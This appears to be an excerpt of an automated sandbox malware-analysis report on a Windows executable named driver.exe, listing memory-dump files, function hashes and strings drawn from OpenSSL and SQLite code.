                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                                                • API String ID: 3535234312-1331951588
                                                                                                                                                                                                                                                • Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                • Instruction ID: b2a58200ee444fe451f96ab451b0045fd4e1f60f97c70cd727bc1e68b9bd28b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6C19A22B0A682A6EE64DA25D5507B963A0FF84BC8F044431EE4D477E6CF7CE461C728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                • API String ID: 22509725-515162456
                                                                                                                                                                                                                                                • Opcode ID: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
                                                                                                                                                                                                                                                • Instruction ID: 26c33d82a1250cd60859bb872e640de3f44f3351dd638f96b98fbe0fa5619dd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A818B72A0AA52E5FB94DF01E448AB97BA5FB54BC4F45A036DA4C472C4EF3CE541C328
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                                • API String ID: 22509725-2451720372
                                                                                                                                                                                                                                                • Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                                • Instruction ID: afef17b140fcbadbe5fac42bab210e3a3b6ece6a1c100f546e8ddabefcfd91e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9071BF22A5AA42A5FB189F21854C3B97391EB54BE9F486331DE6C072C5DF3CE191C364
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: index '%q'
                                                                                                                                                                                                                                                • API String ID: 0-1628151297
                                                                                                                                                                                                                                                • Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                                • Instruction ID: a2c4c380a6d8d4946ceae1a0768ead2bb6db633b87029fbbd3a3b018b16c06b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6371CE32B0A655ADFB108B65D4486BD3BB1FB48B9CF042635DE2E57B88EF389441C724
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %02d
                                                                                                                                                                                                                                                • API String ID: 22509725-896308400
                                                                                                                                                                                                                                                • Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                                • Instruction ID: 64318e9f2f41998bdcec4c39816b83a5e8bbcf6add06636e52d6ce58bc23ba0c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A71BF32A1A692A5F728CF68E4487FD7760FB94788F106031EE8D17A49DF39E485CB14
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C6126570
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                                • API String ID: 800424832-118859582
                                                                                                                                                                                                                                                • Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                • Instruction ID: 09e7eedb99335f23bd2d44e540d38fa6ce4b9e6bd624df30c20ff0c6e468ac3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8751F721F4F6426AFF109B1598053BA9691EF44BD4F588031DE0E4B7E6DF3CE8628728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                • Instruction ID: 8f0ca59b1b4c8bdb8dcc6cf619dedc6a632142d022b155d49dff1be3c8e0507e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD413912A4A28247FB249B27D44137A66E0EF90FACF144235EE5C86AD7DFBCD441E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C90B6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A29BCC15), ref: 00007FF6A29C90D4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-2459203064
                                                                                                                                                                                                                                                • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                • Instruction ID: 9db338936b69dce85dddd4cdc65443c6794ef8bd36d3b9f2a2aabfeef0e3c6fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41A032A4AB428AF758DF27E5811BD6794EF49FD8B454035E94E83B86CEBCF4819300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction ID: 5f470999ecf937b06abc2f2cdefb3448ada16cd907757714173054491b27a582
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4841C732B19A4185DB208F26E4443AA6BA0FB98F98F444035EE4DC7B99DF7CE401D740
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                                • API String ID: 0-402823876
                                                                                                                                                                                                                                                • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                                • Instruction ID: 2276b63529f78fd06fd61d990d5af0f38b5f83961d5a00a7408c169c364b05bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231C220A0AA8266FF04AB25D8553E95681EF48BD4F884135DE0C4B7C7EF3CD1618B28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$System$File
                                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                                • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                • Instruction ID: 7a027d970d9e0cafb761c8d32bda368038f4dd1b92b91aa04c4c708cd36ebbbb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64212772A1564699DF90CF29D40037A76E4EB88BC4F448036DA5E873A4DF3CD1608710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                • Instruction ID: a416c895f446f28496a71d9840456b4e57741596a3721b176f5b637dddf89f80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321E432A4928586FB24AB12D05426D73B1FB84F8CF954036DA8D83696DFFCE9459B40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction ID: 35c87853e0add64c2fb32127df40c301b7cb301cf980b52a70198180d7b8e47e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27115E32609B8182EB208F16F44026977E1FB88F88F584234EB8D87B56DF7CD5519B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction ID: 8c670cf2ca3cfcf05c6d961dac0df574b98f2fd56279d5e767f6498557b10572
